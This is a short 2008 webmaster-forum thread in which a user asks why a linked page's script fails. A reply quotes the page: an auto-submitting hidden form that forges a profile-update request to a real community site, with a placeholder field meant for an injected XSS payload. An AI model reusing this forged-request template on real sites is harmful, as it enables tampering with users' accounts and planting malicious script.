Help - Search - Members - Calendar
Full Version: Script Not Working
Zymic Webmaster Forums > Web Design & Development > Client Side Scripting > HTML and CSS
Horaaan
Oct 12 2008, 04:17 PM
why its not working.
http://www.tutorialistic.net/blah.html
wozzym
Oct 12 2008, 07:05 PM
well what script are you trying to use?
rockacola
Oct 15 2008, 01:00 PM
Source code of that page:
CODE
<html>
<head></head>
<body onLoad=java script:document.form.submit()>

<form action="http://community.mcafee.com/profile.php?do=updateprofile";
method="POST" name="form">

<input type="hidden" name="s" value="">
<input type="hidden" name="do" value="updateprofile">
<input type="hidden" name="customtext" value="###########XSS CODE#########">
<!-- Attacker's XSS Code -->
<input type="hidden" name="month" value="-1">
<input type="hidden" name="day" value="-1">
<input type="hidden" name="year" value="">
<input type="hidden" name="oldbirthday" value="">
<input type="hidden" name="showbirthday" value="2">
<input type="hidden" name="homepage" value="">
<input type="hidden" name="icq" value="">

<input type="hidden" name="aim" value="">
<input type="hidden" name="msn" value="">
<input type="hidden" name="yahoo" value="">
<input type="hidden" name="skype" value="">
</form>
</body>
</html>


Appearently you are learning about XSS attack hunter.gif


also,
the reason it's not working because as soon as you finish loading this page, you'll be automatically redirect to "http://community.mcafee.com/profile.php?do=updateprofile" page, which will give you a "Page Load Error" message.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2009 Invision Power Services, Inc.